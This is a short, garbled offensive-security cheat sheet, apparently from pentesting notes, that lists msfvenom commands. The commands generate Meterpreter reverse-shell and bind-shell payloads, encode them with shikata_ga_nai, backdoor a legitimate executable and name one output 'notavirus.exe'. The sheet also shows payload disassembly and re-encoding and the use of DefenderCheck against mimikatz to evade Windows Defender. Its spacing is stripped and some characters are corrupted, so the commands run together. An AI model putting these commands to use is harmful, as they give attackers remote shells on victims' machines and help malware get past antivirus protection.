msfvenom-p [payload] -f [format] LHOST=[yourip]LPORT=[yourlistenerport]msfvenom-pgeneric/shell_bind_tcpRHOST=<RemoteIPAddress>LPORT=<LocalPort>-felf>term.elfmsfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.10.14.30-fexe-onotavirus.exemsfvenom-pphp/meterpreter_reverse_tcpLHOST=10.10.14.39LPORT=8081-fraw>new.phpmsfvenom-xbase.exe-k-pwindows/meterpreter/reverse_tcpLHOST={DNS/IP/VPSIP}LPORT={PORT/ForwardedPORT}-fexe>example.exemsfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.0.0.5LPORT=9090-ex86/shikata_ga_nai-i8-fc>shell.c# Read all options for a payloadmsfvenom-plinux/x86/exec--list-optionsDefenderCheck.exe.\mimikatz.exe
We can get advanced to disassemble the raw payload and ghostwrite π»
rubydisassemble.rbpayload.raw>payload.asm# Editing the asm for fun and profitβ¦]rubypeencode.rbpayload.asm-opayload.exe
Windows Defender is a formidable adversary. We can use things such as DefenderCheck.exe to bypass checks